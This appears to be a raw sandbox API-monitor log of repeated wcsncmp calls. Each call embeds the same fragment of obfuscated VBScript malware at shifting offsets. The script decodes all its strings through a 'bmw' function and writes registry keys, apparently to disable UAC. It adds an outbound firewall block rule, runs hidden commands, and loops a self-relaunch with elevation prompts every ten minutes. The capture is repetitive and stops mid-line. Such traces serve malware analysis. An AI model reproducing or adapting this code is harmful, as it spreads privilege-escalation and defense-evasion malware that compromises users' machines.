ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.375] wcsncmp (_String1="Rule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.375] wcsncmp (_String1="ule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.375] wcsncmp (_String1="le.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.376] wcsncmp (_String1="e.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.376] wcsncmp (_String1=".Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = 